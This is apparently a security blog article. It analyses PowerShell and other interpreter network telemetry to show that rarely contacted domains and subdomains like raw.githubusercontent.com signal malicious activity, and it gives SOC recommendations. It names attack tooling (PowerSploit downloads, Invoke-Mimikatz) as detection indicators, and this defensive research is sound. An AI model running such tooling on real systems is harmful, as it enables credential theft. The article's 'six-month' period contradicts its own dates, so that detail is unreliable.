03.11.2025
12 min
607
This article discusses how to recognize suspicious requests, why it is important to consider not only the main domain but also subdomains, and how cybersecurity teams can use this approach to improve the effectiveness of SOC monitoring. This is a practical guide for professionals who want to better understand behavioral signals of threats and strengthen the protection of corporate infrastructure.
Based on a six-month analysis of network connection telemetry (June 1 – December 31, 2024), covering over 3.2 million events and 742 unique base domains, an interesting pattern was found: domains that are rarely accessed by PowerShell are significantly more likely to be associated with malicious activity. The odds of a rare domain being malicious were approximately 3.18 times higher than those that are frequently accessed (95% confidence interval: 0.39-25.9), indicating the potential significance of such signals in threat monitoring systems.
Of particular note is the case where the common, highly used domain githubusercontent.com was identified as part of malicious activity through its subdomain raw.githubusercontent.com. This highlights the critical importance of analyzing not only the base domains but also subdomains—especially when it comes to cloud services, where the infrastructure is legitimate, but individual hosted resources can be used to distribute malicious code or organize command-and-control.
This approach helps to more accurately identify hidden risks and improve the effectiveness of threat response in complex corporate environments.
Given a sufficiently high volume of telemetry, domain names that PowerShell rarely connects to are more susceptible to malware than domains that are frequently connected to, regardless of the PowerShell module.
From June 1, 2024 to December 31, 2024, network connection telemetry related to PowerShell processes was collected. The dataset included the following processes: powershell.exe, powershell studio.exe, powershell_ise.exe, powershelltools.exe, powershelltoolsx64.exe, pwsh, and pwsh.exe — various versions and implementations of PowerShell. Non-public top-level domains (e.g., internal/corporate TLDs) were excluded from the event to focus exclusively on external connections.
Using the tldextract library, base domains were extracted (e.g., automox.com was obtained from api.automox.com), resulting in 742 unique base domains. Rarity was determined by the average number of contacts per full domain: the ratio of the total number of contacts to the number of unique full domains within each base domain was calculated; if the average ≤ 5, the domain was considered rare. Based on this criterion, 550 rare domains (74.1% of the total) were identified.
Domain reputation was assessed using ReversingLabs data: a domain was marked as malicious if at least one third-party source indicated such a characteristic. To reduce the number of false positives (e.g., for known legitimate domains), 29 domains were manually verified and reclassified as safe with documented arguments for this decision. For certain subdomains (for example, raw.githubusercontent.com within githubusercontent.com), process arguments in the logs were manually analyzed — as a result, 5 out of 10 such connections were recognized as malicious based on detected commands, such as downloading PowerSploit modules or executing Invoke-Mimikatz, which allowed for more accurate detection of real threats.
The distribution of contacts was highly skewed:
Percentiles: 60th percentile at 5.0 contacts, 90th at 82.0, 95th at 321.55, and 99th at 7,925.87
Rare domains: 550 of 742 domains were classified as rare.
The most active domains were “automox.com” (2,282,308 contacts), “launchdarkly.com” (493,812), and “amazonaws.com” (166,536).
Automox is a service for automated endpoint configuration and patch management.
LaunchDarkly is a software development platform for feature flag management and context-aware feature targeting.
Amazon Web Services (AWS) is the largest cloud services provider.
Rare domains: 9 malicious out of 550 (1.64%, 95% CI: 0.86%–3.08%)
Common domains: 1 malicious out of 192 (0.52%, 95% CI: 0.09%–2.89%), including “githubusercontent.com”
Odds ratio: 3.18 (95% CI: 0.39–25.9), indicating a trend towards higher risk in rare domains, although not statistically significant (chi-square p=0.4291, Fisher’s exact p=0.4668), likely due to the small sample size (9 rare, 1 common)
The domain “githubusercontent.com” (38 contacts, 2 full domains: “raw.githubusercontent.com” and “objects.githubusercontent.com”, average 19.00 contacts per full domain) was flagged as malicious due to 5 manually identified malicious contacts from “raw.githubusercontent.com”. These contacts included potentially malicious PowerShell commands, such as downloading and executing scripts such as PowerSploit or Invoke-Mimikatz.
Another subdomain, “objects.githubusercontent.com” (28 contacts), did not show any malicious activity. This finding illustrates that even commonly used domains can contain malicious subdomains, highlighting the need for subdomain-level analysis to detect threats.
Another research question was to compare the domains accessed by other similar processes with those recorded during PowerShell execution.
The following processes were selected for this analysis:
‘rundll32.exe’
Python (including macOS and Windows versions)
‘cmd.exe’
‘cscript.exe’
‘wscript.exe’
‘bash’
‘zsh’
These processes are mainly other command line or script interpreters, as well as “rundll32.exe”, which allows you to execute dynamic link libraries (DLLs) from the command line.
When the same heuristics as for PowerShell were applied to the domains that these processes were contacting, the results were somewhat different. Of the 156,203 connection records for “rundll32.exe”, 940 unique domains were contacted. Of these, 722 domains were “rare” using the same heuristics applied to PowerShell (i.e., contacted a maximum of five times). Only one of the contacted domains was found to be malicious, either among the rare domains or among the non-rare domains.
Similarly, among the 795,346 total connection records for Python, 825 unique domains were associated with the same criteria, while 616 were rare. None of the rare domains were malicious, while 1 of the non-rare domains was. The cscript, cmd, zsh, and csh processes had similar results: the number of associated malicious domains was either absent or a single number. However, wscript was much more interesting. It had a much lower overall usage rate in the studied dataset, with only 6,936 connection events and 82 unique domains. Of these, 58 domains were rare (or about 71%) and 5 were considered malicious.
Prioritize rare domains: Security teams should focus their investigations on rare domains due to their higher likelihood of harboring malware, despite statistical insignificance. This finding is particularly true for PowerShell and wscript among the processes examined in this study.
Subdomain Analysis: For domains that are frequently contacted, analyze subdomains and process arguments to detect malicious activity, as shown in the example of “githubusercontent.com”.
Integrate manual inspection: Combine automated threat intelligence with manual inspection to reduce false positives and detect nuanced threats, especially in domains with high contact volume.
Investigate anomalous usage of “wscript.exe”: Some environments may still use wscript extensively. However, this study shows that in environments where it is rarely used, it has the highest probability of being used to connect to malicious domains by the processes under investigation.
Further development of this topic opens up several directions for research. One of them is the analysis of temporal patterns to find out whether certain periods of activity are associated with suspicious connections to domains. For example, you can check whether there is a spike in interactions with malicious resources more often on weekends or outside of standard working hours. Time series analysis is suitable for this, which allows you to detect hidden trends and recurring patterns.
Another promising direction is the study of process behavior, in particular their arguments, to find repeated signs characteristic of malicious actions. These can be signs of remote PowerShell script loading or data leakage. Such an approach would help to more accurately assess risks, improve the current relationship between rare and common domains, and identify behavioral indicators of threats.
In the future, an integrated risk assessment system can be created that takes into account the frequency of access, abuse history, domain category, and information from external threat sources. This approach will allow for scalable prioritization of suspicious resources and faster response to potential attacks, transforming analytical findings into practical cybersecurity tools.
The results clearly show that even single, seemingly insignificant events in PowerShell traffic can be early indicators of a threat. Rare domain accesses, as well as work with individual subdomains of popular platforms, remain the most valuable signals for detecting hidden activity. This is especially true for scenarios where PowerShell or wscript are used pointwise and outside of the typical context – such cases often open the way to detecting the loading of malicious components, execution of bypass commands, and further escalation.
